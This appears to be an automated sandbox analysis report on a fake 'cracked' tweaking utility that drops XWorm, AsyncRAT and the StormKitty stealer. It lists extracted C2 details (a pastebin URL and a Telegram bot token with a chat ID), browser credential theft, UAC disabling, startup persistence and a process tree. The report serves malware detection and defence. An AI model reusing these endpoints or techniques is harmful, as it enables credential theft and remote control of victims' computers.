Analysis
-
max time kernel
124s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-09-2024 14:53
Static task
static1
Behavioral task
behavioral1
Sample
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat.html
Resource
win7-20240903-en
General
-
Target
EXM_Premium_Tweaking_Utility_1.0_Cracked.bat.html
-
Size
18KB
-
MD5
0e07191b79c6e425183ded5b707cc6f3
-
SHA1
37949a43076ebb041960d63d80207cddb5a8b2cb
-
SHA256
eb6aa88014c179cbdcc84f381098d027e7d382ae0c706bec7018df5631c23d57
-
SHA512
8e6f989ef6b03f4dfdf95a2d0ca898b36824aba70ec487f21493dbc53cf1740a2d80ad60b8d08d411e68b58229109da8ab7cdf1971fbfb8005ca7513f70b7a53
-
SSDEEP
384:uQJylIn7xpYwuu504YNeHYcDRzhU3E8+UUKIz40qo3HSa3Mm:uQJCIn7XY20tcDRzh4E8+UUKIz40qo3r
Malware Config
Extracted
xworm
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/ZnhxAV6a
-
telegram
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\msedge.exe family_xworm behavioral2/memory/5276-671-0x00000000002A0000-0x00000000002CA000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\svchost.exe family_stormkitty behavioral2/memory/876-673-0x0000000000940000-0x000000000097E000-memory.dmp family_stormkitty -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\svchost.exe family_asyncrat -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
EXMservice.exemsedge.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation EXMservice.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation msedge.exe -
Drops startup file 2 IoCs
Processes:
msedge.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe -
Executes dropped EXE 3 IoCs
Processes:
EXMservice.exemsedge.exesvchost.exepid process 4748 EXMservice.exe 5276 msedge.exe 876 svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
powershell.exepowershell.exepowershell.exepid process 5428 powershell.exe 3936 powershell.exe 948 powershell.exe -
Drops desktop.ini file(s) 7 IoCs
Processes:
svchost.exedescription ioc process File created C:\Users\Admin\AppData\Local\ce38d82e086979754c3eb690a01e858b\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\ce38d82e086979754c3eb690a01e858b\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\ce38d82e086979754c3eb690a01e858b\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\ce38d82e086979754c3eb690a01e858b\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\ce38d82e086979754c3eb690a01e858b\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\ce38d82e086979754c3eb690a01e858b\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Local\ce38d82e086979754c3eb690a01e858b\Admin@HVDPCYGS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000bf081c85bb6cd1e80000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000bf081c850000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900bf081c85000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dbf081c85000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000bf081c8500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
NTFS ADS 2 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 385890.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 434947.crdownload:SmartScreen msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exesvchost.exepid process 3276 msedge.exe 3276 msedge.exe 2800 msedge.exe 2800 msedge.exe 1484 identity_helper.exe 1484 identity_helper.exe 5048 msedge.exe 5048 msedge.exe 5428 powershell.exe 5428 powershell.exe 5428 powershell.exe 948 powershell.exe 948 powershell.exe 948 powershell.exe 3936 powershell.exe 3936 powershell.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe 876 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs
Processes:
msedge.exepid process 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
powershell.exeWMIC.exepowershell.exevssvc.exesrtasks.exepowershell.exemsedge.exesvchost.exedescription pid process Token: SeDebugPrivilege 5428 powershell.exe Token: SeIncreaseQuotaPrivilege 5720 WMIC.exe Token: SeSecurityPrivilege 5720 WMIC.exe Token: SeTakeOwnershipPrivilege 5720 WMIC.exe Token: SeLoadDriverPrivilege 5720 WMIC.exe Token: SeSystemProfilePrivilege 5720 WMIC.exe Token: SeSystemtimePrivilege 5720 WMIC.exe Token: SeProfSingleProcessPrivilege 5720 WMIC.exe Token: SeIncBasePriorityPrivilege 5720 WMIC.exe Token: SeCreatePagefilePrivilege 5720 WMIC.exe Token: SeBackupPrivilege 5720 WMIC.exe Token: SeRestorePrivilege 5720 WMIC.exe Token: SeShutdownPrivilege 5720 WMIC.exe Token: SeDebugPrivilege 5720 WMIC.exe Token: SeSystemEnvironmentPrivilege 5720 WMIC.exe Token: SeRemoteShutdownPrivilege 5720 WMIC.exe Token: SeUndockPrivilege 5720 WMIC.exe Token: SeManageVolumePrivilege 5720 WMIC.exe Token: 33 5720 WMIC.exe Token: 34 5720 WMIC.exe Token: 35 5720 WMIC.exe Token: 36 5720 WMIC.exe Token: SeIncreaseQuotaPrivilege 5720 WMIC.exe Token: SeSecurityPrivilege 5720 WMIC.exe Token: SeTakeOwnershipPrivilege 5720 WMIC.exe Token: SeLoadDriverPrivilege 5720 WMIC.exe Token: SeSystemProfilePrivilege 5720 WMIC.exe Token: SeSystemtimePrivilege 5720 WMIC.exe Token: SeProfSingleProcessPrivilege 5720 WMIC.exe Token: SeIncBasePriorityPrivilege 5720 WMIC.exe Token: SeCreatePagefilePrivilege 5720 WMIC.exe Token: SeBackupPrivilege 5720 WMIC.exe Token: SeRestorePrivilege 5720 WMIC.exe Token: SeShutdownPrivilege 5720 WMIC.exe Token: SeDebugPrivilege 5720 WMIC.exe Token: SeSystemEnvironmentPrivilege 5720 WMIC.exe Token: SeRemoteShutdownPrivilege 5720 WMIC.exe Token: SeUndockPrivilege 5720 WMIC.exe Token: SeManageVolumePrivilege 5720 WMIC.exe Token: 33 5720 WMIC.exe Token: 34 5720 WMIC.exe Token: 35 5720 WMIC.exe Token: 36 5720 WMIC.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeBackupPrivilege 408 vssvc.exe Token: SeRestorePrivilege 408 vssvc.exe Token: SeAuditPrivilege 408 vssvc.exe Token: SeBackupPrivilege 5960 srtasks.exe Token: SeRestorePrivilege 5960 srtasks.exe Token: SeSecurityPrivilege 5960 srtasks.exe Token: SeTakeOwnershipPrivilege 5960 srtasks.exe Token: SeBackupPrivilege 5960 srtasks.exe Token: SeRestorePrivilege 5960 srtasks.exe Token: SeSecurityPrivilege 5960 srtasks.exe Token: SeTakeOwnershipPrivilege 5960 srtasks.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeDebugPrivilege 5276 msedge.exe Token: SeDebugPrivilege 876 svchost.exe -
Suspicious use of FindShellTrayWindow 51 IoCs
Processes:
msedge.exepid process 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
msedge.exepid process 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe 2800 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2800 wrote to memory of 1840 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 1840 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 4524 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 3276 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 3276 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe PID 2800 wrote to memory of 2580 2800 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat.html1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdbf0b46f8,0x7ffdbf0b4708,0x7ffdbf0b47182⤵PID:1840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:22⤵PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:82⤵PID:2580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:12⤵PID:3236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:12⤵PID:2624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:12⤵PID:396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:12⤵PID:632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:12⤵PID:1240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:12⤵PID:4456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:12⤵PID:3700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6464 /prefetch:82⤵PID:1888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6464 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:12⤵PID:5088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:4276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6600 /prefetch:12⤵PID:404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:12⤵PID:5304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:12⤵PID:5444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:12⤵PID:5452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:12⤵PID:5576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,3235431430184281180,3238671408987110213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:12⤵PID:5760
-
-
